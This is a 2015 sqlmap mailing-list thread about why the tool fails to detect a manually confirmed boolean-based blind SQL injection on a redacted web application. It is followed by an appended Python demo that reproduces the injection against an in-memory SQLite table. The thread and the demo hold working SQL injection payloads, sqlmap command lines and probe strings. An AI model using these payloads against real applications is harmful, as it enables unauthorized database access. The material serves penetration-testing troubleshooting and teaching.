Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQ
From: Brandon P. <bpe...@gm...> - 2015-04-28 14:07:54
Technically, it shouldn't*

On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...> wrote:
> The injections I see like those are all suffixed with the start of a
> comment (# or --). So, technically it should matter if single quotes are
> used in the latter part of the boolean clause.
>
> For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa'
> being injectable. Using fdsa' AND 1=1# would result with the trailing
> single quote being part of the comment and ignored by MySQL.
>
> Can you exploit the injection by hand using 1=1# or 1=1--?
>
> On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...> wrote:
>> Hi Brandon,
>>
>> Thanks for your comment. Confirming that I've tried risk=3 with
>> level=5 with the same results. I've looked more closely at the
>> requests that sqlmap is sending to check if the parameter is
>> injectable. It is testing the Sec parameter with values such as:
>>
>> PackageSelection) AND 1477=7114
>> PackageSelection) AND 1631=1631
>> PackageSelection') AND 5603=7729
>> PackageSelection') AND 1631=1631
>> PackageSelection' AND 3943=9381
>> PackageSelection' AND 1631=1631
>> PackageSelection" AND 3324=4690
>> PackageSelection" AND 1631=1631
>> PackageSelection) AND 4734=6616 AND (6346=6346
>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>
>> When in fact, I assume it would need to use logic like I used to get
>> distinguishable responses:
>>
>> PackageSelection (returns response A)
>> PackageSelection' AND '1'='1 (returns response A)
>> PackageSelection' AND '1'='2 (returns response B)
>>
>> In a nutshell, it doesn't appear to be trying single quotes and values
>> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
>> typical format for checking boolean-based blind SQLi.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
>>> It's a GET, so there wouldn't be a content type, unless I am mistaken.
>>>
>>> Alistair, have you tried --risk=3 with --level=5 yet?
>>>
>>> Sent from a phone
>>>
>>> On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>> Can you please send the unredacted content of request.txt to my address?
>>>
>>> If not, then please at least send me the content of traffic file which you
>>> can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
>>> run.
>>>
>>> Bye
>>>
>>> On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> The contents of the request file are as follows:
>>>>
>>>> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>>>> Host: <redacted>
>>>> Accept: */*
>>>> Accept-Language: en
>>>> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
>>>> Connection: close
>>>> Referer: <redacted>
>>>> Cookie: <redacted>
>>>>
>>>> I've redacted some of the details as it's not appropriate to draw
>>>> attention to an internet facing application's SQLi vulnerability.
>>>>
>>>> When providing the request file as part of the following command:
>>>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>>>> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>>>> 'industries' -v 1
>>>>
>>>> sqlmap executes as normal but cannot identify (and therefore cannot
>>>> exploit) the boolean-based blind vulnerability which I've verified
>>>> manually.
>>>>
>>>> Thanks again,
>>>>
>>>> Al.
>>>>
>>>> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>> And what is the content of request file?
>>>>>
>>>>> Bye
>>>>>
>>>>> On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote:
>>>>>>
>>>>>> Hi sqlmappers,
>>>>>>
>>>>>> I'm a fairly experienced user of sqlmap having used it extensively in
>>>>>> the past. I came across what appeared to be pretty typical boolean-based
>>>>>> blind SQLi in an application I'm (legally) testing. However, for the
>>>>>> first time, I'm unable to get sqlmap to recognise the parameter as
>>>>>> vulnerable to exploit it further. And as we know, manually exploiting
>>>>>> blind SQLi is cumbersome to say the least.
>>>>>>
>>>>>> Here is a summary of the requests I've made to manually confirm the
>>>>>> vulnerability.
>>>>>>
>>>>>> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>>>>>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>>>>>> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>>>>>>
>>>>>> I've tried various sqlmap flags and thought the following command
>>>>>> would give me the best chance of success:
>>>>>>
>>>>>> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>>>>>> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>>>>>> 'industries' -v 1
>>>>>>
>>>>>> Note: the string 'industries' is text that appears in response A but
>>>>>> not response B.
>>>>>>
>>>>>> I've looked at the requests that sqlmap is sending in the background
>>>>>> (proxied through burp). It appears that it's attempting to exploit
>>>>>> this with the AND statement as it should but is not using single
>>>>>> quotes as per my example above.
>>>>>>
>>>>>> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
>>>>>> more than happy to contribute some time to improve it so it can
>>>>>> identify injectable parameters such as these in the future.
>>>>>>
>>>>>> Thanks,
>>>>>>
>>>>>> Al.
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> One dashboard for servers and applications across Physical-Virtual-Cloud
>>>>>> Widest out-of-the-box monitoring support with 50+ applications
>>>>>> Performance metrics, stats and reports that give you Actionable Insights
>>>>>> Deep dive visibility with transaction tracing using APM Insight.
>>>>>> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
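The point the thread turns on is how the injected condition is terminated. Alistair's manual payloads close the string the application opened (' AND '1'='1), Brandon's suggestion comments the application's closing quote out (' AND 1=1--), and the payloads Alistair saw sqlmap send did neither. The script below is an added example, not sqlmap's code and not anything the posters ran: it stands in an in-memory SQLite table (the hypothetical help_sections table and its columns are my assumption, not the target application's schema) for the MSSQL-backed page, concatenates the Sec value into a single-quoted literal the way a vulnerable page would, and runs the three payload boundaries through the same "does the marker string appear" test that --string 'industries' performs.

```python
import sqlite3

# Constructed stand-in for the lookup behind /help/UserGuide.aspx?Sec=...
# The table and column names are hypothetical; the marker text mirrors the
# thread's --string 'industries'.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE help_sections (sec TEXT, body TEXT)")
    conn.execute(
        "INSERT INTO help_sections VALUES "
        "('PackageSelection', 'Pick a package for one of our supported industries')"
    )
    return conn


def vulnerable_lookup(conn, sec):
    # The bug: the Sec value is concatenated into a single-quoted literal.
    sql = "SELECT body FROM help_sections WHERE sec = '%s'" % sec
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return ""  # broken SQL renders as an error page with no body text
    return row[0] if row else ""


def page_matches(conn, sec, marker="industries"):
    # Equivalent of sqlmap's --string check: True means "response A".
    return marker in vulnerable_lookup(conn, sec)


def boolean_blind_check(conn, value, prefix, true_cond, false_cond, suffix=""):
    """Return (baseline, true_match, false_match) for one payload boundary."""
    baseline = page_matches(conn, value)
    t = page_matches(conn, value + prefix + true_cond + suffix)
    f = page_matches(conn, value + prefix + false_cond + suffix)
    return baseline, t, f


def is_injectable(result):
    baseline, t, f = result
    # Injectable only if the TRUE payload reproduces the original page and the
    # FALSE payload does not; two identical failures prove nothing.
    return baseline and t and not f


BOUNDARIES = {
    # The shape Alistair reported seeing from sqlmap: quote opened, never closed.
    "bare":    ("'", " AND 1=1", " AND 1=2", ""),
    # Alistair's manual payloads: the condition's own literal closes the quote.
    "quoted":  ("'", " AND '1'='1", " AND '1'='2", ""),
    # Brandon's suggestion: a trailing comment swallows the app's closing quote.
    "comment": ("'", " AND 1=1", " AND 1=2", "--"),
}


def run_all():
    conn = make_db()
    return {
        name: is_injectable(boolean_blind_check(conn, "PackageSelection", *b))
        for name, b in BOUNDARIES.items()
    }


if __name__ == "__main__":
    for name, verdict in run_all().items():
        print(f"{name:8s} injectable={verdict}")
```

With the "bare" boundary both requests produce an unterminated string literal, so both return the error page and the parameter looks uninjectable; the "quoted" and "comment" boundaries both yield response A for the true condition and response B for the false one. The comment case relies on `--` being a line comment, which holds for SQLite and Microsoft SQL Server; MySQL wants `#` or `-- ` with a trailing space, which is why Brandon's MySQL example uses `#`. sqlmap's `--prefix` and `--suffix` options exist precisely to force a particular boundary like these when the automatic ones miss.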